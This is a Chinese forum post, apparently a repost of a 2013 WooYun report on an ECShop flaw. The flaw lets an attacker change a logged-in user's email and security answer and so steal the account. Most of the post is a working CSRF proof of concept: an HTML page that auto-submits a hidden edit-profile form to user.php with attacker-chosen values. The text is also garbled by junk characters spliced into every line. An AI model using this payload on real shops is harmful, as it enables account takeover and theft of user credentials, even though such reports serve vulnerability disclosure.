找回密码
 立即注册
查看: 2337|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:# @7 [& H4 S) i& |
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
- _0 X; G* _! B
( G# n" T) q4 J: R+ RDemo For:http://www.wooyun.org/bug.php?action=view&id=395& C$ O# Z8 k3 H& I$ x0 b6 ~. m

& \1 d( K% t* d+ W: M* u详细说明:  k, P/ Y8 t- y% E( [
利用csrf和xss可以突破官方所说的“障碍”
- u# l4 Z7 L, t' Cxss版本已经有人说明
7 T8 Y/ A$ X6 }( m: m" k这里给出csrf版本
" O4 w! c) Z- V" x! Z9 t+ u. u$ v0 w% O) w4 c9 M# U/ T2 m
漏洞证明:
) @& k' N# F. w3 i" q& J2 W<html>
- ^1 h) @! |& E7 E7 R<body>
) x6 E$ t% j+ w& [3 l$ F( F/ Q<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
& E! [" O- i- q<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">1 k7 u+ {9 J/ k* x; E5 P9 N' r
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
7 \8 ?" _( S5 a8 q: K<INPUT TYPE="text" NAME="sel_question" value="ecshop">
; r  N+ M6 ^7 H! q<INPUT TYPE="text" NAME="passwd_answer" value="exploit">5 j' O$ f$ I2 q# j( Q
</body>% X8 H' E3 A, Y$ B& q3 ?* v* U2 r
<script>
7 }8 v) [% Z4 _5 }% [, hdocument.forms[0].submit();
- `7 f; q! f; g' u& m</script>) C  l# @( g6 k; h
</html>1 s, m- i: S6 K
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
0 Z0 A: o, c0 V" |/ i% g$ D+ v, T2 }! ?  ?" G- e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表